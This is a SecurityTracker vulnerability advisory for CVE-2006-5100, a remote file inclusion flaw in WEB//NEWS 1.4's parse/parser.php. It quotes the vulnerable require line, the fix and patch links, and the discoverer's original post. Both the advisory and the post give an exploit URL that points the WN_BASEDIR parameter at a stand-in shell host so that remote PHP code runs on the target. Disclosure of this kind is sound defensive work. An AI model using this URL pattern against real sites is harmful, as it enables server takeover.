SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   WEB//NEWS Vendors:   Stylemotion.de
WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016938
SecurityTracker URL:  http://securitytracker.com/id/1016938
CVE Reference:   CVE-2006-5100   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Sep 27 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.4 prior to Build 26092006-01
Description:   ThE-WoLf-KsA reported a vulnerability in WEB//NEWS. A remote user can execute arbitrary code on the target system.

The 'parse/parser.php' script does not properly validate user-supplied input in the 'WN_BASEDIR' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

htpp://[target]/[scriptPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (Version 1.4 Build 26092006-01).

Also, a patch (1.4 security patch 2) is available at:

http://www.stylemotion.de/downloads-id3-web-news-1-4-sicherheits-patch-2.html

The stylemotion.de advisory is available at:

http://www.stylemotion.de/forum/thread-1978-1-sicherheitspatch.html

Vendor URL:  www.stylemotion.de/webnews.html (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

#==============================================================================================
#webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v1.4
#
#================================================================================================
#Bug in : parse/parser.php
#
#Vlu Code :
#--------------------------------
#
#            require($WN_BASEDIR."/parse/parser.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : ThE-WoLf-KsA
#
#Conatact : the-wolf-ksa[at]hotmail.com
#XP10_hackEr Team
#
#WWW.XP10.COM
==================================================================================================

vendor:
http://www.stylemotion.de/downloads-id1-web-news-1-4.html

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC